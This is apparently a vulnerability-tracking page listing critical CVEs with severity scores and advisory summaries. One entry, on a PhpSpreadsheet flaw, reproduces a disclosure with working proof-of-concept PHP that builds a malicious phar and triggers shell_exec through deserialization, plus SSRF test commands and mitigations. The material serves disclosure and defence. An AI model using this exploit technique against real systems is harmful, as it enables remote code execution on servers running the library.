Skip to main content
CVE-2026-41940 CRITICAL POC KEV EUVD KEV PATCH THREAT NEWS Act Now

Authentication bypass in cPanel & WHM allows unauthenticated remote attackers to gain unauthorized access to the control panel by exploiting a flaw in the login flow. The vulnerability is confirmed actively exploited (CISA KEV) with publicly available exploit code, an EPSS score of 16.52% (95th percentile), and affects multiple long-term support branches of cPanel & WHM as well as WP Squared. Given that cPanel administers shared hosting environments, successful exploitation typically grants attackers control over many downstream customer sites.

Authentication Bypass Cpanel Whm Wp Squared
NVD GitHub VulDB Exploit-DB
CVSS 4.0
9.3
EPSS
16.5%
Threat
5.4
CVE-2018-25318 CRITICAL POC Act Now

Tenda FH303/A300 firmware V5.07.68_EN contains a session weakness vulnerability that allows unauthenticated attackers to modify DNS settings by exploiting insufficient cookie validation. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Authentication Bypass Tenda
NVD Exploit-DB
CVSS 4.0
9.3
EPSS
0.0%
CVE-2018-25317 CRITICAL POC Act Now

Tenda W3002R/A302/W309R wireless routers version V5.07.64_en contain a cookie session weakness vulnerability that allows unauthenticated attackers to modify DNS settings by exploiting insufficient. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Authentication Bypass Tenda
NVD Exploit-DB
CVSS 4.0
9.3
EPSS
0.0%
CVE-2018-25316 CRITICAL POC Act Now

Tenda W308R v2 V5.07.48 contains a cookie session weakness vulnerability that allows unauthenticated attackers to modify DNS settings by exploiting insufficient session validation. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

Authentication Bypass Tenda
NVD Exploit-DB
CVSS 4.0
9.3
EPSS
0.0%
CVE-2026-26015 CRITICAL PATCH Act Now

DocsGPT is a GPT-powered chat for documentation. From version 0.15.0 to before version 0.16.0, an attacker accessing both the official DocsGPT website or any local and public deployment, can craft a malicious payload bypassing the "MCP test" behavior to achieve arbitrary remote code execution (RCE). This issue has been patched in version 0.16.0.

Command Injection RCE Docsgpt
NVD GitHub VulDB
CVSS 4.0
10.0
EPSS
0.3%
CVE-2026-3325 CRITICAL Act Now

SQL injection (SQLi) in MegaCMS v12.0.0, specifically in the “id_territorio” parameter of the “/web_comunications/cms/get_provincias” endpoint. The vulnerability arises from inadequate validation and sanitisation of user input. Specifically, via a POST request, the “id_territorio” parameter, used immediately after the registration form is submitted, could be manipulated by an unauthenticated attacker to execute arbitrary SQL queries.

SQLi
NVD VulDB
CVSS 4.0
10.0
EPSS
0.0%
CVE-2026-38992 CRITICAL PATCH GHSA Act Now

Remote code execution in Cockpit CMS versions 2.13.5 and earlier allows unauthenticated attackers to execute arbitrary system commands on the server by injecting malicious payloads through the filter parameter across multiple endpoints. The vulnerability exploits the MongoLite database layer's $func operator, which processes user-controlled input as executable code. Public proof-of-concept exists and the attack is fully automatable with total system compromise potential, though EPSS scoring suggests limited observed exploitation attempts (2nd percentile) at time of analysis.

Code Injection RCE N A
NVD GitHub
CVSS 3.1
9.8
EPSS
0.0%
CVE-2026-36841 CRITICAL Act Now

Remote unauthenticated command injection in TOTOLINK N200RE V5 router allows complete device compromise via formMapDelDevice function. Attackers can execute arbitrary OS commands by injecting malicious payloads into the macstr or bandstr parameters with no authentication required (CVSS 9.8, AV:N/AC:L/PR:N/UI:N). Public proof-of-concept code exists per SSVC framework (exploitation: poc), making this immediately weaponizable against internet-facing devices. EPSS data unavailable, but CVSS vector and POC availability indicate critical real-world risk for consumer routers with default configurations exposed to the internet.

Command Injection
NVD GitHub VulDB
CVSS 3.1
9.8
EPSS
0.1%
CVE-2026-5166 CRITICAL PATCH Act Now

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Software Center allows Path Traversal. This issue affects Pardus Software Center: before 1.0.3.

Path Traversal Pardus Software Center
NVD VulDB
CVSS 3.1
9.6
EPSS
0.0%
CVE-2026-42231 CRITICAL PATCH GHSA Act Now

Prototype pollution in n8n's XML webhook parser (xml2js library) enables remote code execution when chained with Git node SSH operations. Authenticated users with workflow editing permissions can inject malicious XML payloads to pollute JavaScript object prototypes, then leverage the polluted prototype in Git node operations to execute arbitrary code on the n8n host server. GitHub advisory GHSA-q5f4-99jv-pgg5 confirms patches available in versions 1.123.32, 2.17.4, and 2.18.1. No CISA KEV listing or public POC identified at time of analysis, but the CVSS 10.0 score appears inconsistent with the authenticated (PR:L expected) nature described in the advisory.

RCE Prototype Pollution
NVD GitHub VulDB
CVSS 4.0
9.4
EPSS
0.5%
CVE-2026-42232 CRITICAL PATCH GHSA Act Now

Prototype pollution in n8n's XML node allows authenticated workflow editors to achieve remote code execution through global prototype manipulation. The vulnerability affects n8n workflow automation platform versions prior to 1.123.32, 2.17.4, and 2.18.1, enabling attackers with workflow creation privileges to inject malicious properties into JavaScript object prototypes that can be exploited by other nodes to execute arbitrary code. Vendor-released patches are available for all affected version branches. No public exploit code or active exploitation (CISA KEV) has been identified at time of analysis, though the CVSS 10.0 score reflects the critical scope change and complete system compromise potential.

Prototype Pollution Information Disclosure
NVD GitHub VulDB
CVSS 4.0
9.4
EPSS
0.1%
CVE-2026-41586 CRITICAL GHSA Act Now

Remote code execution in Hyperledger fabric-sdk-java (all versions 1.0.0 through 2.2.26) allows unauthenticated attackers to execute arbitrary commands via malicious serialized Java objects. The deprecated SDK's Channel.java class deserializes untrusted byte arrays without input filtering in readObject() and deSerializeChannel() methods, enabling classic Java gadget chain exploitation. Publicly available exploit code exists (ysoserial toolkit), and exploitation requires only that an application accept Channel serialization data from attacker-controlled sources such as compromised files, external APIs, or injected parameters. EPSS data unavailable; not listed in CISA KEV. Vendor has published GHSA advisory but provides no patch-remediation requires migration to the replacement fabric-gateway SDK.

Deserialization Java
NVD GitHub
CVSS 4.0
9.3
EPSS
0.0%
CVE-2026-34084 CRITICAL PATCH GHSA Act Now

The usage of `is_file`, used to verify if the `$filename` is indeed an actual file, by all(?) `Reader` implementations (inside the helper function `File::assertFile`) is php-wrapper aware, for any [php wrappers](https://www.php.net/manual/en/wrappers.php) implementing `stat()`. The 3 wrappers `ftp://`, `phar://` and `ssh2.sftp://`, all satisfy this requirement - 2 of which are shown in the PoC below. This results in a SSRF, at "best", and RCE at worse. This was tested against the `latest` release - but the issue seems to go back a while from a first quick check (still present in `v1.30.2`). ## PoC To reproduce the vulnerable behavior, the following scripts were used: `php.ini` file, only needed to build the malicious phar, not necessary to exploit on a deployed instance of the library: ```ini phar.readonly=0 ``` `make_phar.php` to create the malicious file: ```php <?php // php -c php.ini make_phar.php class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $pop = new GadgetClass('touch /tmp/poc.txt'); $phar = new Phar('exploit.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $phar->addFromString('whatever', 'dummy content'); $phar->setMetadata($pop); $phar->stopBuffering(); rename('exploit.phar', 'exploit.xlsx'); // optional echo "exploit.xlsx created \n"; ``` `test.php` showcases the unsafe pattern: ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $filename = $argv[1] ?? null; if (!$filename) { echo "Usage: php test.php <path>\n"; echo " e.g. php test.php phar://exploit.xlsx/whatever\n"; exit(1); } echo "Calling IOFactory::load('" . $filename . "')\n"; try { $spreadsheet = IOFactory::load($filename); var_dump($spreadsheet); } catch (Throwable $e) { echo "Vuln has still triggered even if exception triggers.\n"; } ``` ### RCE Run the PoC (for RCE): ```bash php -c php.ini make_phar.php && php test.php phar://exploit.xlsx/test; ls -lah /tmp/poc.txt ``` The file `/tmp/poc.txt` should now be present on disk. > Note: the vuln still triggers if the file pointed to inside the phar does not exist/is not supported (html, xlsx, etc...). This means an attacker could "silently" trigger the vuln without leaving any error logs if the file inside the phar exists and is supported instead. ### SSRF Run the PoC (for SSRF): ```bash ncat -lvp 21 #run on another terminal php test.php ftp://127.0.0.1:21/test ``` Observe a connection is made to `127.0.0.1` on port `21`. ## Root Cause Analysis Following the API exposed by the library, using `IOFactory::load`, the code proceeds as follows: ```php IOFactory::load($filename) -> IReader::load($filename, $flags) -> IReader::loadSpreadsheetFromFile($filename) -> File::assertFile($filename, ...) -> is_file($filename); ``` The one obvious gadget that was found is guarded via `__unserialize` (or `__wakeup` in older versions) in the `XMLWriter` class, making it not possible to use the phar deserialization as a standalone attack vector using just this library - it is still viable to create "POP" gadget chains via other classes which may be available in real-world deployment scenarios. ```php public function __destruct() { // Unlink temporary files // There is nothing reasonable to do if unlink fails. if ($this->tempFileName != '') { @unlink($this->tempFileName); } } /** @param mixed[] $data */ public function __unserialize(array $data): void { $this->tempFileName = ''; throw new SpreadsheetException('Unserialize not permitted'); } ``` Phpspreadsheet is used as a backbone for many library wrappers, including very widespread ones from [packagist ](https://packagist.org)like `maatwebsite/excel` for Laravel, `sonata-project/exporter` and so on, hence the deserialization vector stays relevant in other contexts. ## Suggested mitigations Use `is_file` only after making sure the filename does not contain any php wrapper: ```php $scheme = parse_url($filename, PHP_URL_SCHEME); // strlen check > 1 to avoid issues with Windows absolute paths (e.g. C:\...), Windows quirks :) // since no built-in or commonly registered PHP stream wrapper uses a single-character scheme, this should be ok, to my knowledge if ($scheme !== null && strlen($scheme) > 1) { throw new \PhpOffice\PhpSpreadsheet\Exception( "Stream wrappers are not permitted as file paths: {$filename}" ); } ``` or perhaps even just passing it to `realpath` before calling `is_file` to ensure it is parsed correctly: ```php $real = realpath($filename); // not php wrapper aware AFAIK if ($real === false) { throw new \PhpOffice\PhpSpreadsheet\Exception("Invalid file path: {$filename}"); } // from here on, $real should be a clean absolute path so we can pass it to is_file() if (!is_file($real)) { throw new ... } ``` > Note: `stream_is_local()` would also not be safe here - as it considers `phar://` to be local and would not block it.

PHP Microsoft SSRF Deserialization
NVD GitHub VulDB
CVSS 4.0
9.2
EPSS
0.1%
CVE-2026-7381 CRITICAL Act Now

Plack::Middleware::XSendfile through version 1.0053 allows remote unauthenticated attackers to read arbitrary files from nginx-proxied servers by injecting malicious X-Sendfile-Type and X-Accel-Mapping headers. When the middleware's sendfile type is not explicitly configured, clients can force nginx's X-Accel-Redirect mode and manipulate path mappings to access sensitive files outside intended directories. The middleware has been deprecated as of version 1.0053 and will be removed in future Plack releases. EPSS score of 0.01% suggests low current exploitation activity despite the high CVSS 9.1 rating. No public exploit code identified at time of analysis, though the attack technique mirrors the documented CVE-2025-61780 vulnerability in Rack::Sendfile.

Information Disclosure Nginx
NVD VulDB
CVSS 3.1
9.1
EPSS
0.0%
CVE-2026-30893 CRITICAL POC PATCH Act Now

Wazuh Manager (4.4.0 through 4.14.3) contains a path traversal vulnerability in the cluster synchronization routine that allows an authenticated cluster peer to write arbitrary files outside the intended extraction directory on other cluster nodes. Writing to sensitive locations such as cron directories or Python module paths leads to remote code execution. CVSS 9.0 Critical (network-accessible, high privilege required, scope changed). Patch available in v4.14.4; no active exploitation identified.

RCE Python Path Traversal Wazuh
NVD GitHub VulDB
CVSS 3.1
9.0
EPSS
0.1%
CVE-2026-42523 CRITICAL PATCH GHSA Act Now

Jenkins GitHub Plugin 1.46.0 and earlier improperly processes the current job URL as part of JavaScript implementing validation of the feature "GitHub hook trigger for GITScm polling", resulting in a stored cross-site scripting (XSS) vulnerability exploitable by non-anonymous attackers with Overall/Read permission.

Jenkins XSS
NVD VulDB
CVSS 3.1
9.0
EPSS
0.0%

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy